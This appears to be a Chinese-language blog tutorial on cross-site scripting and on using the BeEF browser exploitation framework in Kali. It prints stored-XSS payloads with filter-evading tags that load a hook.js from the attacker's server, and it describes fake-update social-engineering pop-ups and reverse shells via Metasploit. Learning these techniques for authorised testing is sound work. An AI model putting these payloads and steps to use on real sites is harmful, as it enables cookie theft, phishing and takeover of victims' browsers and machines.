今天主要聊一下,從認識xss的危害到beef-xss的利用
beef是一個類似與sql注入的sqlmap一樣,也是一種工具。
一、xss簡介
定義: 跨站腳本攻擊。xss是一種在web應用中的計算機安全漏洞,
它允許web用戶將一些惡意代碼植入到提供給其它用戶使用的頁面中
種類:
反射型xss:
提交得數據成功的實現了xss,但是僅僅是對你這次訪問產生了影響,是非持久型攻擊
存儲型xss:
你提交的數據成功實現了xss,存入了數據庫,別人訪問這個頁面的時候就會自動觸發
Dom型xss:
經過一種編碼的xss,詳情: https://t.cn/A6Apaxi8
二、認識xss的危害
危害:
盜取cookie(主要)
獲取內網ip
獲取瀏覽器保存的明文密碼
截取網頁屏幕
網頁上記錄鍵盤
。。。
等等很多,這僅僅是常見的
三、beef-xss簡介
定義:
一款瀏覽器攻擊框架,利用Ruby語言開發的,
kali中默認安裝的一個模塊
用於實現對xss漏洞的攻擊和利用
簡單說,
Beef-xss是對xss漏洞的最大化利用,
直接獲取對方系統信息以及作爲社會工程學工具進行利用
題外話,
其實beef最經典的還是他的打開圖像(一個牛)
四、beef-xss使用
啓動步驟: (kali環境中)
第一:進入beef文件夾 cd /usr/share/beef-xss/
補充:可以看看該文件夾都有什麼文件
beef --- 主程序
xxx.pem --- 證書
.yaml --- 配置文件
db --- 數據庫
modules --- 模塊
extensions --- 利用工具
第二:啓動beef ./beef
補充:第一次使用會提示修改默認密碼(beef)
如何修改?
cd /usr/share/beef-xss/
leafpad config.yaml //leafpad是一款編輯器
此時應該以文本方式打開了該配置文件
找到,
user: "beef"
passwd: "beef"
隨意修改爲自己想改的,保存,關閉
第三:重啓beef ./beef
最下邊會有一些網址,如:
Hook URL: http://127.0.0.1:3000/hook.js
UI URL: http://127.0.0.1:3000/ui/panel
第一個是鉤子----類似xss平臺的一些連接
//不懂xss平臺的可以去百度一下,很多實戰教程估計
第二個是beef的網頁登錄連接,直接複製,瀏覽器打開即可
//簡單說,就是beef的後臺
網頁功能的一些介紹
左上角的Hooked Browsers是受害者主機;
下邊兩個選項,即上線的,沒上線的
中間的Getting Started是一些說明,即說明手冊
Logs是日誌 Zombies是監控
注意的一點,我們在打存儲型xss的時候,如留言框處,不要留言http://127.0----/hook.js
而是這種:
<sCRiPt sRC=//127.0.0.1:3000/hook.js></sCrIpT>
</tExtArEa>'"><sCRiPt sRC=http://127.0.0.1:3000/hook.js></sCrIpT>
是不是很類似xss平臺的一些平臺? 其實本質原理都是一樣的
問: 爲什麼要在鉤子前加上<script>等等標籤?
答:因爲要執行js語句,不然怎麼去加載執行你的惡意腳本
beef-控制檯介紹:
~點擊受害者主機,選擇Commands選項(中間偏上的位置)
~看到一些燈(紅的、白的、綠的、橙的)
//其實是每個命令模塊都有一個交通燈圖標,用於指示以下內容
綠色:命令模塊對目標起作用,對用戶應該是不可見的
橙色:命令模塊對目標起作用,但可能對用戶可見
白是:尚未針對此目標驗證命令模塊
紅色:命令模塊不適用於此目標
常用模塊:
~瀏覽器(browser)
~持續控制(Persistentce)
~社會工程學(Social Engineering)
多提一下這個社工模塊,
可以讓瀏覽器彈窗顯示 “XXX” 可以更新了,
管理員一點擊更新,就會下載一些咱們 讓他下載的東西
這種模仿,幾乎可以以假亂真。所以,也多提一下
工具的使用,一定要在有授權的情況下,大家心裏有個數
根據這些功能可以產生非常大的危害,因爲本質上xss的危害就是操縱瀏覽器,瀏覽器可以一定程度上操縱計算機。
而beef就是一個集成了xss危害的工具。除了上邊提到的一些偷cookie之外還可以乾的很多
比如,讓受害者主機播放你想讓他播放的音樂、獲取網頁源碼、持續控制、社會工程學等等
在多說一下,這個beef可以搭配msf使用,產生更大的危害,如反彈shell